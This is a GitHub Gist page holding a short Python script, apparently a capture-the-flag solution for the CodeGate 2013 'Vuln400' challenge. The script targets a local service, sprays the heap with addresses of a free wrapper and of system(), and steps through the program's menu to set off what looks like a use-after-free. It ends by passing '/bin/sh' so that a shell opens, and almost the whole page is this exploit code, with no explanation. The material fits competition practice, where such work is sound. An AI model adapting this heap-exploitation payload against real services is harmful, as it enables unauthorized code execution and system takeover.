Skip to content

Instantly share code, notes, and snippets.

@tsunpoko

tsunpoko/exploit.py

Created September 25, 2016 05:35
Show Gist options
  • Save tsunpoko/befdc6c0065dd24f4aeceb50c57fef4e to your computer and use it in GitHub Desktop.
Save tsunpoko/befdc6c0065dd24f4aeceb50c57fef4e to your computer and use it in GitHub Desktop.
Download ZIP
[CodeGate 2013] Vuln400
Raw
exploit.py
from No___Op import *
target = 'localhost:4444'
c = Pwning( target )
system = 0x8048630
free_wrapper = 0x80487c4
time.sleep(30)
payload = ''
payload += '1\naaaa\naaaa\naaaa\n'
payload += '1\naaaa\naaaa\n' + p32(free_wrapper)*500 + p32(system)*500+ '\n'
payload += '1\naaaa\naaaa\naaaa\n'
payload += '2\n2\n'
payload += '3\na\n' * 128
payload += '1\n'
payload += '4\n'
payload += '1\naaaa\naaaa\naaaa\n'
payload += '1\naaaa\naaaa\naaaa\n'
payload += '2\n'
payload += '4\n'
payload += '3\n/bin/sh\n' * 128
payload += '2\nbbbb\nbbbb\n'
payload += '1\n'
c.write(payload)
c.dbg_shell()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment